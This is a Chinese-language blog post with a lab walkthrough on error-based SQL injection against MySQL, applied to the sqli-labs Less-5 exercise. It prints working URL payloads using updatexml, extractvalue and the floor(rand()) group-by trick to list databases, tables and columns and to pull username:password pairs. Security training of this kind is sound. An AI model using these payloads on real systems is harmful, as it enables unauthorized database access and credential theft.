<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>报错注入 | Dokiy</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="报错注入的定义当网站的页面上没有显示位用于展示SQL语句执行后的结果，但是SQL语句执行可以输出错误信息，那么攻击者可以利用注入过程中返回的错误信息进行判断。 报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。 常见的函数1.extractvalue() 2.updataxml() 3.count() + rand() +floor() +group  by">
<meta property="og:type" content="article">
<meta property="og:title" content="报错注入">
<meta property="og:url" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Dokiy">
<meta property="og:description" content="报错注入的定义当网站的页面上没有显示位用于展示SQL语句执行后的结果，但是SQL语句执行可以输出错误信息，那么攻击者可以利用注入过程中返回的错误信息进行判断。 报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。 常见的函数1.extractvalue() 2.updataxml() 3.count() + rand() +floor() +group  by">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230514102049350.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510231110006.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510231854074.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510232558988.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510232905062.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510233507675.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510233925272.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234240463.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234427307.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234518718.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234547823.png">
<meta property="og:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234636472.png">
<meta property="article:published_time" content="2023-05-09T12:56:50.000Z">
<meta property="article:modified_time" content="2023-05-14T02:20:50.395Z">
<meta property="article:author" content="aurora">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230514102049350.png">
  
    <link rel="alternate" href="/atom.xml" title="Dokiy" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Dokiy</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://DokiDokiy.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-报错注入" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" class="article-date">
  <time datetime="2023-05-09T12:56:50.000Z" itemprop="datePublished">2023-05-09</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      报错注入
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="报错注入的定义"><a href="#报错注入的定义" class="headerlink" title="报错注入的定义"></a>报错注入的定义</h2><p>当网站的页面上没有显示位用于展示SQL语句执行后的结果，但是SQL语句执行可以输出错误信息，那么攻击者可以利用注入过程中返回的错误信息进行判断。</p>
<p>报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。</p>
<h2 id="常见的函数"><a href="#常见的函数" class="headerlink" title="常见的函数"></a>常见的函数</h2><p>1.extractvalue()</p>
<p>2.updataxml()</p>
<p>3.count() + rand() +floor() +group  by() 导致的主键重复</p>
<h2 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue()"></a>extractvalue()</h2><p>extractvalue (xml_document,xpath_string)</p>
<p>第一个参数是xml文档对象名称</p>
<p>第二个参数作用是从xml文档对象中返回查询到的字符串值，返回结果长度限制在32位字符。</p>
<pre><code>extractvalue(null,concat(0x7e,(sqli_inject),0x7e))

注：利用extractvalue()对数据进行一个排序，指定一个参数为null，可以换成1、#或者其他符号，使其报错，并执行第二个参数语句。0x7e表示&quot;-&quot;号。
</code></pre>
<h2 id="UpdateXml函数"><a href="#UpdateXml函数" class="headerlink" title="UpdateXml函数"></a>UpdateXml函数</h2><p>函数用法：</p>
<p>UPDATEXML(XML_document,XPath_string,new_value)</p>
<p>三个字符串参数：</p>
<p>1  .XML_Document是String格式，为XML文档对象的名称</p>
<p>2   .XPath_string(<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=Xpath&spm=1001.2101.3001.7020">Xpath</a> 格式的字符串)</p>
<p>3    .new_value,string格式，替换查找到符合条件的数据</p>
<h3 id="为什么可以用于报错注入："><a href="#为什么可以用于报错注入：" class="headerlink" title="为什么可以用于报错注入："></a>为什么可以用于报错注入：</h3><p>UpdateXml 函数实际上是去更新了XML文档，但是我们在XML文档路径的位置里面写入了<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E5%AD%90%E6%9F%A5%E8%AF%A2&spm=1001.2101.3001.7020">子查询</a>，我们输入特殊字符，然后就因为不符合输入规则然后报错了，但是报错的时候他其实已经执行了那个子查询代码。</p>
<h2 id="sqli靶场less5"><a href="#sqli靶场less5" class="headerlink" title="sqli靶场less5"></a>sqli靶场less5</h2><p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230514102049350.png" alt="image-20230514102049350"></p>
<p>1.判断注入类型</p>
<p>get 1’ and ’1’ =’1 回显如下：</p>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510231110006.png" alt="image-20230510231110006"></p>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510231854074.png" alt="image-20230510231854074"></p>
<pre><code>？id=1’ 
报错，单引号导致，页面显示数据库的报错信息，确定注入点为单引号字符型
</code></pre>
<p>2.判断报错函数是否可用</p>
<pre><code>？id=0&#39; and updatexml(1,0x7e)--a
</code></pre>
<p>页面正常报错，确定报错函数可用</p>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510232558988.png" alt="image-20230510232558988"></p>
<p>3.脱库</p>
<p>获取所有的数据库，地址栏输入：</p>
<pre><code>?id=1&#39; and updatexml(1,
    substr(
      concat(0x7e,
          (select group_concat(schema_name) 
          from information_schema.schemata)
       )
    ,34,31)
,3) -- a
</code></pre>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510232905062.png" alt="image-20230510232905062"></p>
<p>获取security库中的所有表，地址栏输入：</p>
<pre><code>
?id=1&#39; and extractvalue(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = &#39;security&#39;))) %23
</code></pre>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510233507675.png" alt="image-20230510233507675"></p>
<p>查user表中的列名</p>
<pre><code>？id=1&#39; union select 1,2, (updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema = &#39;security&#39; and table_name = &#39;users&#39;)),1)) %23
</code></pre>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510233925272.png" alt="image-20230510233925272"></p>
<p>查字段（双查询注入）</p>
<pre><code>1&#39; union select 1, count(*), concat((select concat(username,&#39;:&#39;,password) from users  limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a  %23
</code></pre>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234240463.png" alt="image-20230510234240463"></p>
<p>将0改为1,2,3,4……..</p>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234427307.png" alt="image-20230510234427307"></p>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234518718.png" alt="image-20230510234518718"></p>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234547823.png" alt="image-20230510234547823"></p>
<p><img src="/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/image-20230510234636472.png" alt="image-20230510234636472"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://dokidokiy.github.io/2023/05/09/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" data-id="cljwyeabm000hy0vg9na6aijr" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2023/05/11/sql-labs%E9%9D%B6%E5%9C%BAless1/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          sql-labs靶场less1
        
      </div>
    </a>
  
  
    <a href="/2023/05/07/sql%E6%B3%A8%E5%85%A5/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">sql注入</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/06/">六月 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/05/">五月 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/06/22/1.%E5%91%BD%E4%BB%A4%E6%A0%BC%E5%BC%8F%E5%92%8C%E5%9F%BA%E7%A1%80%E5%91%BD%E4%BB%A4/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/06/22/shell%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/05/22/upload-labs%E9%9D%B6%E5%9C%BA/">upload-labs靶场</a>
          </li>
        
          <li>
            <a href="/2023/05/21/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a>
          </li>
        
          <li>
            <a href="/2023/05/17/%E2%80%99%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%E2%80%99/">宽字节注入</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2023 aurora<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>